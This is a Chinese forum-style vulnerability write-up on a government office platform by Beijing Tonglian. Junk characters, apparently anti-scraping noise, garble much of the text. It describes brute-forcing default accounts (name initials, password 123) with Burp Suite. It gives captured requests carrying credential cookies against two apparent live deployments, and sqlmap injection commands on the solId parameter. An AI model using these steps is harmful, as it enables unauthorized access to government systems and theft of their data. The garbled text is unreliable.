! ~' V. v* |, |
+ L" {* e! ]( ~& N' y- t$ l# _ 3 s7 ^$ j# n7 H4 G$ I; {# o$ k
% O o! \8 W2 _: J$ a1 X/ C
平台简介:( E6 g+ n N- G# F+ T4 W0 e
% d3 c# Z l1 O" K9 P: N' `
7 b8 ]( S& }% m6 W7 T 3 p# [: \- G( u _' U& p
) E/ N" B* C, g6 d( K+ N- |4 O- t: Z
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
; i& V: l* [2 [8 p; v0 H5 ?同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
7 r7 k, ]3 w/ q4 E @) ]% E& k同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
3 R4 j' Y4 Q* C) i0 n' B; p
0 C& z6 q9 ?6 ]+ N1 L& L
1 L( J8 y% X4 f5 d) I / D# e" c9 G9 O6 B( c5 k$ A9 j
; Q5 q7 f2 N( b: e# }3 q2 j" |0 |- s: f) I; S$ X" |
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
: R6 ?; o9 w" ~, Q+ c1 ~# o' |% Y
/ u2 K: P+ h* g( O0 u; c( \0 ~4 N9 e Z( O/ Q
$ y t" |" w1 Q7 J! Z2 I! @: c
: b3 F( V B: M$ R
; A x3 [0 c0 D( y( W9 J http://1.1.1.1:7197/cap-aco/#(案例2-)& U" T0 Z& `$ `3 [/ ~
* g& _/ ~# T9 E, U8 }. E
, [5 F5 N4 Z8 I/ i+ W2 U: S http://www.XXOO.com (案例1-官网网站); l9 x8 s3 C; m7 u$ c0 k8 }7 L/ }
$ o* K2 u+ y* W% i& k% X( M- o% B: T
& T$ L% @5 k* T3 A0 a4 m
- j: R& t# ?2 ? @, Y
9 V5 |3 `3 F, Z! s& W ^ 漏洞详情:
% Z$ b; w) Q a4 A ( l5 p! W. ] `1 S1 Z/ E
& [% m9 t4 c% O/ h+ k3 m( e. ? 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试, y4 T4 m$ q& t
, r; M9 U' V5 x' R% c6 L2 s6 b8 W2 {) f
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
) \+ D0 C7 O; H, o$ Z
2 b: C0 v( g2 n: y) M* j; R* e$ a
5 c: _4 q+ o/ Y; Q6 |& V# \ ; u/ v0 ~4 Z1 n6 V" ^+ z# C
- e2 i1 ^" A* M+ b: s
7 ]2 P- K- c* \+ |- I1 y" x
L4 I, ~+ }& r5 K
5 A* F* ?; ?% ]+ f" G) s7 a @1 M: n! g# ^6 C: G
status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:
; ~' A8 G( B5 K6 W0 [! f
3 N( s- {: e; B8 y0 c6 L/ y$ |! M8 V! Z1 \4 {
1、案例1-官方网站
6 [) `( u* k# O( h- O. o2 E $ ~$ J! r4 ~( q! j9 p& Z6 U1 `
1 h. a u s4 F) ^ GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1
0 f3 `$ D, p7 W& A0 ~" a/ Z6 y! _
! M& f* C% |4 R4 z
0 f7 A1 X* s% L$ w; e3 b9 X Host: www.XXOO.com3 b4 o: h, k F! h* j" \8 H
# E W" u$ y6 W- P- l
6 W, B5 a4 K: C7 p4 }' W
Proxy-Connection: Keep-Alive
/ G, B7 p2 @3 s6 ?* h+ F6 D
; k# W, D5 E7 D, F Z
p1 \% |4 o* q3 H6 Z' M- Y Accept: application/json, text/javascript, */*; q=0.01
! }# a2 R: I- k7 W( r / C# U& H1 t+ S0 q! [4 L8 U
1 o4 K' W* o! N( i, B
Accept-Language: zh-CN' p" }; P4 F" I& d. p
% ~- c& b. c [8 U L. U- ?: n
Content-Type: application/json
8 J: ]+ j& H Z' V) l
* N( j2 K2 s/ ?1 B, j) o3 Q0 L1 V
9 e5 p' z- W1 j1 e User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko
6 X& P/ X0 o- f1 `9 C# k A4 d + o9 E9 S2 G v; V2 q+ a3 L
6 M8 W/ M, w9 w% I X-Requested-With: XMLHttpRequest
$ [+ H4 ?, r1 h8 _4 n! s 5 V& Y! p: C) H: B
6 b" P" K4 J" u, K& O
Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002
+ R0 y2 B( I9 C _8 x
D" X6 z$ z( s+ k: G* F- A
) v6 C0 Z% ?7 z7 J/ P4 t Accept-Encoding: gzip, deflate, sdch
x) i( t3 a, u
" X9 f2 H/ u7 U8 c7 l- o
' m" W: z5 v, ~4 d# ]6 k Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e
8 y' e3 {" H& U5 ]7 B . o7 a& z" h8 V6 c
5 H+ u2 C( c5 z! s 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
9 }' E' |' v+ r. X" ^; ]0 P
4 n. ^/ b0 @4 C1 _8 k$ [7 y0 b; S, C0 |) ?
/ [% S9 t: D9 O y+ U. G k
7 A) e. ]7 ^# C6 J* q1 X& s. b. J
8 a* j5 d, C1 X, }* e7 g
" l' a* a3 m3 u: b 7 N; u1 B/ e0 }, K
! l" l! e# G$ x ]$ @4 J
) w6 h! m) {' ]% a# s1 o$ c
- M2 j: O% P( b9 ?- i
* K% ?* u* o J* T
* |; ] s& _& p- L6 N + R3 {/ l" f2 F' q
" ~3 B% r6 p L' V
; o( D$ O7 N( x7 M - L$ v; n- {* l: U+ Y8 j/ M W
9 v0 m# [: _3 w5 C 2、案例2-某天河云平台
% T) h" h, I) g/ ]# X Y- N1 V; G: I ) M5 I. f' l6 q* e/ T7 m# f" |
1 f3 M, W# g" i& z GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1
) \/ m- H7 X0 H/ P
4 d# T5 ]0 j- a0 Q
, H) j1 ~2 P$ k$ P* s* ]# e' | Host: 1.1.1.:7197
# X) h+ ~+ ~3 c' }
- z# ~( d! H" r. s3 x n) q$ c. ~( t' N! M2 R5 q8 M- e' N
Accept: application/json, text/javascript, */*; q=0.01
$ A% b+ e$ N, ~/ v( F 0 S$ y k# O$ o2 D2 s8 D8 {
+ S+ K% |& h. s) |
X-Requested-With: XMLHttpRequest9 l9 \+ w0 }: }/ v& I- m+ A
/ w2 n2 x+ O0 ~; c
: r4 u! b [/ O3 C User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0
" h, x! m, {- Y6 x; {
" M' O/ a. ~& x, Q: B7 S1 P' t2 U: V% [8 v, Z7 p: }' w3 ]' H$ _
Content-Type: application/json
& G5 ~7 ?3 W( ?0 m3 B5 g
* S) T) p9 O5 J: ]) ^+ U/ }* e. z
1 e3 |- X. y: Z' f0 u E Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008/ X% }, L' J( `' E# X! ~: t; w
0 l. `8 `3 s& ?( C( k+ J
! |0 e) n7 y% ]0 _9 o Accept-Language: zh-CN,zh;q=0.8
* s( f& @. z; L }- ?+ R; \, v
0 U9 g: U9 h0 K* ~# c# D$ z- X$ m. |- y
Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1
: g B% W: F0 `
$ _4 g5 j6 z1 x
9 E+ j% I4 |. X' e Connection: close0 E# q8 T+ _- Q' d/ U" D
8 k+ K. _- y7 C6 O$ t, R: z* N( |. F' c. `7 X4 K3 Q8 k* n
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
3 Z2 f' j$ K- i6 V, Q / \7 ?& f; z, I- H z3 k
- {3 w1 B, i. x6 C
& v! Q: v* `0 r# J- z; {
% v4 o. s; A+ N q* w" D& f) e+ Y8 ^& Q4 R" X* `1 z5 [3 W1 Z
+ Z5 n3 m( D3 x3 x) d: k
|